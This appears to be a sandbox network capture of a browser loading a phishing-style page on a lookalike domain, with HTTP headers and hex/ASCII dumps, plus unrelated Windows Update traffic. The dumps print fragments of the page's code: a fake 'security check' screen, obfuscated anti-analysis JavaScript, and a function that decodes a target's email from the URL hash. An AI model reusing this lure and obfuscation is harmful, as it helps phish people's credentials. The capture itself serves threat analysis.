                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                                                Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                                                                                Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                                                                                Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                                                                                Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                                                                                Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                                                                                Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                11192.168.2.1649728188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:37 UTC906OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/11384/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:37 UTC885INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:37 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Last-Modified: Mon, 28 Oct 2024 10:57:45 GMT
                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kt5aDQgaGVVn%2FpLYV7RziWt%2FFVD%2BAxOimXe9uQD7qbdJRK%2F5CW0M5%2F%2FXP9pnIpASBsk4uSZJW0gLB1C%2BXF7uKVr%2BplnmqzrJ%2BSg52Ur0JtJtIw3uZEGT5BWEt9pJcHjzdPj%2FppIQ7fSr6luDnY4ofLt0Q2jTeOc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68a4dbb46c44-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1467&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2858&recv_bytes=1484&delivery_rate=2148367&cwnd=251&unsent_bytes=0&cid=d4102ae89e8c86ca&ts=561&x=0"
                                                                                                                                                2024-10-28 16:47:37 UTC484INData Raw: 31 64 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75
                                                                                                                                                Data Ascii: 1dfe<!DOCTYPE html><html lang="en" dir="ltr" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" class="responsive"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/tu
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 3c 73
                                                                                                                                                Data Ascii: <meta name="referrer" content="origin-when-cross-origin"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no"> <meta name="format-detection" content="telephone=no"><s
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69
                                                                                                                                                Data Ascii: margin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (max-width:720px){.main-content{margi
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 53 70 65 63 69 61 6c 3a 52 61 6e 64 6f 6d 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 75 72 6c 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 65 74 45 6d 61 69 6c 46 72 6f 6d 55 72 6c 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 62 61 73 65 36 34 45 6d 61 69 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 64 65 63 6f 64 65 64 45 6d 61 69 6c 20 3d 20 61 74 6f 62 28 62 61 73 65 36 34 45 6d 61 69 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 65 63 6f 64 65 64 45 6d 61 69
                                                                                                                                                Data Ascii: Special:Random"); return response.url; } function getEmailFromUrl() { const base64Email = window.location.hash.substring(1); const decodedEmail = atob(base64Email); return decodedEmai
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 32 65 34 32 62 38 29 7b 76 61 72 20 5f 30 78 35 64 66 62 65 3d 5f 30 78 38 64 32 66 2c 5f 30 78 35 35 34 61 37 31 3d 5f 30 78 31 35 34 66 61 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 39 30 63 65 63 34 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 63 30 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 62 64 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 63 61 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 63 37 29 29 2f 30 78 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 62 39 29 29 2f 30 78 35 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 62
                                                                                                                                                Data Ascii: 2e42b8){var _0x5dfbe=_0x8d2f,_0x554a71=_0x154fab();while(!![]){try{var _0x90cec4=-parseInt(_0x5dfbe(0xc0))/0x1*(parseInt(_0x5dfbe(0xbd))/0x2)+parseInt(_0x5dfbe(0xca))/0x3*(-parseInt(_0x5dfbe(0xc7))/0x4)+-parseInt(_0x5dfbe(0xb9))/0x5*(parseInt(_0x5dfbe(0xb
                                                                                                                                                2024-10-28 16:47:37 UTC1369INData Raw: 29 72 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 31 29 5d 3d 3d 27 53 27 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 35 29 5d 28 30 78 30 29 29 72 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 31 29 5d 3d 3d 27 48 27 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 35 29 5d 28 30 78 30 29 29 72 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63
                                                                                                                                                Data Ascii: )return![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc1)]=='S'[_0x2ec06a(0xc5)](0x0))return![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc1)]=='H'[_0x2ec06a(0xc5)](0x0))return![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc
                                                                                                                                                2024-10-28 16:47:37 UTC357INData Raw: 63 6c 61 73 73 3d 22 63 6f 72 65 2d 6d 73 67 20 73 70 61 63 65 72 22 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 62 6f 64 79 2d 74 65 78 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 57 65 20 6e 65 65 64 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 22 3e 0d 0a 20 20 20
                                                                                                                                                Data Ascii: class="core-msg spacer" id="challenge-body-text"> <div>We need to review the security of your connection before proceeding. </div> </div> </div> </div> <div class="footer" role="contentinfo"> <div class="footer-inner">
                                                                                                                                                2024-10-28 16:47:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                12192.168.2.1649730188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:37 UTC609OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/244223768:1730132189:NbzFRZvTcBmmYjVsO5xy0JykfjjXCxNv2Vd8K9KmlQk/8d9c6884aac83168/.dA4utKOCXqNXZ7ka1Dy8Dmaet_UVdAWtZsXKlq57e4-1730134052-1.2.1.1-YB_bFKSHTRqrgWaOlj1EXOYaZKAO68GetFMt5G0UvZHFFnkZOi74rI0vPm2dKjee HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:37 UTC919INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:37 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 7
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-out: sexQ+LmYueb5K25ouBV0Bzo1WVA5t7cka68=$rcGxkjZoz5Ao/ieA
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=of9SrURN11GZd3gKavVy9RAbzMdGYvTucGzvV3rdmDxU3K6e%2BlHbC50Pmw4Is%2BXafJIio9WvOW4DquGPgHbtcbxmfPsnSjH1Ii0z8ttUattgFIdR00YDjRxVbnmXUwtCa3raLuhyJo7kbEIUwJeJQpT8lGQDFy4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68a59c6028ab-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1444&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2858&recv_bytes=1187&delivery_rate=2004152&cwnd=251&unsent_bytes=0&cid=ea1069953b2cd56f&ts=153&x=0"
                                                                                                                                                2024-10-28 16:47:37 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                Data Ascii: invalid


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                13192.168.2.1649732172.202.163.200443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:38 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=612cNYgATxTDloo&MD=Z6lemAgC HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                                                2024-10-28 16:47:38 UTC560INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Pragma: no-cache
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Expires: -1
                                                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                MS-CorrelationId: 9992a179-3c9f-4045-a4d6-630a7e352c63
                                                                                                                                                MS-RequestId: be78b599-4266-4575-98ac-77caa246f44a
                                                                                                                                                MS-CV: LmWVQwYCekKPEy8d.0
                                                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:38 GMT
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 24490
                                                                                                                                                2024-10-28 16:47:38 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
